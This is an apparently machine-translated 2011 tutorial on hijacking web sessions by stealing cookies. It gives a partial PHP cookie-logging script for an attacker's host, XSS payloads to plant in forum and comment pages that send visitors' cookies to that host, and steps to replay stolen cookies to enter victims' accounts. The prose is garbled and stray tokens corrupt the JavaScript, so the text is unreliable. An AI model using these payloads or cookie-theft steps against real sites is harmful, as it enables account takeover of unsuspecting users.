Session Hijacking

18/06/2011 09:11

Session Hijacking:

Session hijacking is the process of operating a computer session valid, that is stealing cookies from the victim.

So now, let us know below.

What is a cookie?

A cookie is known as a web cookie or HTTP cookie is a small piece of text stored by the user browser.A cookie is sent as a head by the web server to the browser cookie on the client side.A is static and returned unchanged the browser each time it connects to the server.

A cookie is a limit that is set on the server and the end time is automatically deleted.

Cookies are used to maintain user authentication and conduct during the navigation by car, possibly across multiple visits.

What can we do after stealing cookies?

Well, as you know the website to authenticate users with a cookie, which can be used to distract victims of the victims session.The can replace the stolen cookie to hijack the session cookie.

The following is a cookie stealing script must be stored in host.It attacker receives the cookie data and stored in a text file.
PHP Code:
<?php

function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
Now we come to the most difficult in which to inject a bit of JavaScript in the page html sites, whose victims have visit.We must now find a place to show the javascript.

Look for sites that contain interactive user comments and forums.

Post the following code that invokes or activates the cookielogger on the host.

Code:
<script language="Java script">
RubicusFrontendIns.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
</script>
Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
Code:
<a href="java script:RubicusFrontendIns.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>

Clicking an image also can activate the script.For this purpose you can use the below code.

Code:
<a href="java script:RubicusFrontendIns.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;

<img src="URL OF THE IMAGE"/></a>
Now we have cookie, what to do with this ..?

Cookie Editor Download mozilla plugin.

Go to the target site -&gt; open the editor of Cookie -&gt; Change the cookie and update the victim's stolen cookies page.Thats you! You should now be in the account. Cookie Editor Download mozilla plugin from here: https://addons.mozilla.org/en-US/firefox/addon/573